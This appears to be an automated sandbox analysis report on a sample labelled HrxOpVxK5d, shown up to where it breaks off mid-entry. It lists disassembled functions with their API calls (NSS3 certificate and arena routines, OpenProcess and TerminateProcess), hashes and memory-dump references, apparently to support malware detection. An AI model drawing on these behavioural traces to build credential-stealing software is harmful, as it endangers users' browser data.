Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: 00bb945c22210fc228a4f9c13ac23d62ba8088c88fb3dae750437356da9a9436
Instruction ID: e54715cc9203ea18f46990d58d1df72e53f1935683dde6bb1709a0c71c0b53c9
Opcode Fuzzy Hash: 00bb945c22210fc228a4f9c13ac23d62ba8088c88fb3dae750437356da9a9436
Instruction Fuzzy Hash: DC416CB49016428FDB04DF29C484A69BBF0FF48318F1A856DDC998BB11E770F891CB90

Function 6CF86C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CF86C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CF86CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CF86CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D0A8FE0), ref: 6CF86CFE

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: a39d2b164701226f5bb7b258fe964cd6103c4472f53fdd8634b35dbc9c98fead
Instruction ID: 422f20033ed7b44aeaa3a4370fbe8d5308f32c2ec6ad0b8a535d1c97a518ee93
Opcode Fuzzy Hash: a39d2b164701226f5bb7b258fe964cd6103c4472f53fdd8634b35dbc9c98fead
Instruction Fuzzy Hash: A631AEB2A012169FEB08CF65C881ABFBBF5EF49248B14442DE905E7341EB319905CBA0

Function 6D094F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6D094F5D
free.MOZGLUE(?), ref: 6D094F74
free.MOZGLUE(?), ref: 6D094F82
GetLastError.KERNEL32 ref: 6D094F90

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: bb2cbf953980e1121b152f9d94048017406429649e9e6db55e51c08a0d7b8e99
Instruction ID: 73ab76fea22b283e462081a850d7106d482e727380d1441ca55e05bb1474a40c
Opcode Fuzzy Hash: bb2cbf953980e1121b152f9d94048017406429649e9e6db55e51c08a0d7b8e99
Instruction Fuzzy Hash: FA312B75A0061B6BFB00CB69DC91BEFB3F8FF49354F014125EC25AB285DB34D9049695

Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041967B

Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
CloseHandle.KERNEL32(00000000), ref: 00419766

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: b116a8e1ce62414cb6063cf3baced8b88001eb0d7bdae96dce0c8ced725c3813
Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
Opcode Fuzzy Hash: b116a8e1ce62414cb6063cf3baced8b88001eb0d7bdae96dce0c8ced725c3813
Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56

Function 6CFE8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6CFE72EC), ref: 6CFE855A

Part of subcall function 6CFE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF88298,?,?,?,6CF7FCE5,?), ref: 6CFE07BF
Part of subcall function 6CFE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFE07E6
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE081B
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE0825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6CFE72EC), ref: 6CFE859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CFE72EC), ref: 6CFE85B8
PR_SetError.NSS3(FFFFE005,00000000,?,6CFE72EC), ref: 6CFE8600

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: 8a64ed09fb127ced9647669dba093f2e274d8275b7a913bbdc0f4046e344ce6d
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: 6B21D672A00311ABE7109F2DDC40B2B76AAAF8932CF65813AD866D7790EF31DC05C791

Function 6CF86420 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6CF85DEF,?,?,?), ref: 6CF86456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6CF85DEF,?,?,?), ref: 6CF86476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6CF85DEF,?,?,?), ref: 6CF864A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6CF85DEF,?,?,?), ref: 6CF864C2

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID:
API String ID: 3886907618-0
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: f21e80f3c1709b96787f087c48d141b93c4a3c280708167c64844a39a737488d
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: D4212CB1A123016FFB109F68DC05B6B76F9EB44308F144539F51AC6B41E7B2D558C791

Function 6CFD4590 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6CFD473B,00000000,?,6CFC7A4F,?), ref: 6CFD459B

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

TlsGetValue.KERNEL32(?,?,6CFD473B,00000000,?,6CFC7A4F,?), ref: 6CFD45BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CFD473B,00000000,?,6CFC7A4F,?), ref: 6CFD45D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CFD473B,00000000,?,6CFC7A4F,?), ref: 6CFD45E8

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID:
API String ID: 2963671366-0
Opcode ID: d0449f3e1adf7d234ad110a8e4604c10ecd55ed772e794bfe8e18c2fa9555267
Instruction ID: 15291cff68f9f9b14aab918e2e9d827ca285299f983f079c975c5aa28fd448dc
Opcode Fuzzy Hash: d0449f3e1adf7d234ad110a8e4604c10ecd55ed772e794bfe8e18c2fa9555267
Instruction Fuzzy Hash: B121D0B1A00606ABDB009F69DC456AABBB4FF49319F084139E949D7A10EB31F964CB91

Function 6CF704D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6CF704F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF7053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF70558
GetLastError.KERNEL32 ref: 6CF7057A

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: edd4e0985e9fd2457c2906267dc06e48931711c914b3a0198fe7110949e10227
Instruction ID: 9129758de3919f3649dd191fc49f6a18a4f947ae4d0829fd7116ba7d103d4565
Opcode Fuzzy Hash: edd4e0985e9fd2457c2906267dc06e48931711c914b3a0198fe7110949e10227
Instruction Fuzzy Hash: F6213071A002189FDB08DF69DC94E9EB7B8FF49318B10816AE809DB351D775ED01CBA0

Function 6CFF2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFF2E08

Part of subcall function 6CFE14C0: TlsGetValue.KERNEL32 ref: 6CFE14E0
Part of subcall function 6CFE14C0: EnterCriticalSection.KERNEL32 ref: 6CFE14F5
Part of subcall function 6CFE14C0: PR_Unlock.NSS3 ref: 6CFE150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CFF2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CFF2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFF2E95

Part of subcall function 6CFE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE1228
Part of subcall function 6CFE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CFE1238
Part of subcall function 6CFE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE124B
Part of subcall function 6CFE1200: PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE125D
Part of subcall function 6CFE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CFE126F
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CFE1280
Part of subcall function 6CFE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CFE128E
Part of subcall function 6CFE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CFE129A
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CFE12A1

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 2ccb1648cd863ee04d5eec477122182a520ff9f88d4b09be2f7389e0be5b0608
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: B32104B2D003855BE700CF549D44BEB3764EF9530CF214269DD285B762F7B2E6998292

Function 6CFAACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CFAACC2

Part of subcall function 6CF82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CF82F0A
Part of subcall function 6CF82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CF82F1D

Part of subcall function 6CF82AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CF80A1B,00000000), ref: 6CF82AF0
Part of subcall function 6CF82AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF82B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CFAAD5E

Part of subcall function 6CFC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CF8B41E,00000000,00000000,?,00000000,?,6CF8B41E,00000000,00000000,00000001,?), ref: 6CFC57E0
Part of subcall function 6CFC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CFC5843

CERT_DestroyCertList.NSS3(?), ref: 6CFAAD36

Part of subcall function 6CF82F50: CERT_DestroyCertificate.NSS3(?), ref: 6CF82F65
Part of subcall function 6CF82F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF82F83

free.MOZGLUE(?), ref: 6CFAAD4F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 98e29be3df8619c62118da259b1367f70c813027ef270e27c32ae362ea8d599f
Instruction ID: 03e2068bf08e578a6adfd9d52d8c576e57b9559a820e5d724812db1ae55e51d8
Opcode Fuzzy Hash: 98e29be3df8619c62118da259b1367f70c813027ef270e27c32ae362ea8d599f
Instruction Fuzzy Hash: C52190B1D01218CBEB10DFA4D9056EEFBF4AF05218F455069DC45BB610FB31AA5ACBA1

Function 6CFC24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CFC24FF
EnterCriticalSection.KERNEL32(?), ref: 6CFC250F
PR_Unlock.NSS3(?), ref: 6CFC253C
PR_SetError.NSS3(00000000,00000000), ref: 6CFC2554

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: b61eb75f1199bd234cfb58b95179485b00843849ae583b665dbcd3170848cf84
Instruction ID: 98ee80f53a328a66bc7c546ef5965b86e8a9651bf2e133c185a77518226bd05b
Opcode Fuzzy Hash: b61eb75f1199bd234cfb58b95179485b00843849ae583b665dbcd3170848cf84
Instruction Fuzzy Hash: BD11E676E00109ABEB009F68DC49A6F7B78EF49328B554525ED089B301EB32E955C7E2

Function 6CFDECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CFDF0AD,6CFDF150,?,6CFDF150,?,?,?), ref: 6CFDECBA

Part of subcall function 6CFE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF887ED,00000800,6CF7EF74,00000000), ref: 6CFE1000
Part of subcall function 6CFE0FF0: PR_NewLock.NSS3(?,00000800,6CF7EF74,00000000), ref: 6CFE1016
Part of subcall function 6CFE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF887ED,00000008,?,00000800,6CF7EF74,00000000), ref: 6CFE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CFDECD1

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CFDED02

Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CFDED5A

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: abd1596841c32020902b7b0e7d98bde7a609117d4d21133ddf718b42c777386d
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 272184B1D007425BE700CF26D944B56B7E5BFA9348F1AC219E81C87662EB70E594C6D1

Function 6D00EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CFF7FFA,?,6CFF9767,?,8B7874C0,0000A48E), ref: 6D00EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CFF7FFA,?,6CFF9767,?,8B7874C0,0000A48E), ref: 6D00EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CFF7FFA,?,6CFF9767,?,8B7874C0,0000A48E), ref: 6D00EE14

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

memcpy.VCRUNTIME140(?,?,6CFF9767,00000000,00000000,6CFF7FFA,?,6CFF9767,?,8B7874C0,0000A48E), ref: 6D00EE33

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 63e2398fa48e8dcd66bc852723cd006b73b9d1f71392b7c950a664109e2e58ad
Instruction ID: 861d3a28db83cf168869fea8442ee2b29f5b435e8a33930b10edacbc7ac2d151
Opcode Fuzzy Hash: 63e2398fa48e8dcd66bc852723cd006b73b9d1f71392b7c950a664109e2e58ad
Instruction Fuzzy Hash: A91170B1A0474BBBFB109E65DC84B56B3A8FB04359F114536EE19E7240E731E464CBA2

Function 6CFA8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CFA8DE7
EnterCriticalSection.KERNEL32 ref: 6CFA8DFC
PR_Unlock.NSS3 ref: 6CFA8E2D
PR_SetError.NSS3 ref: 6CFA8E49

Memory Dump Source

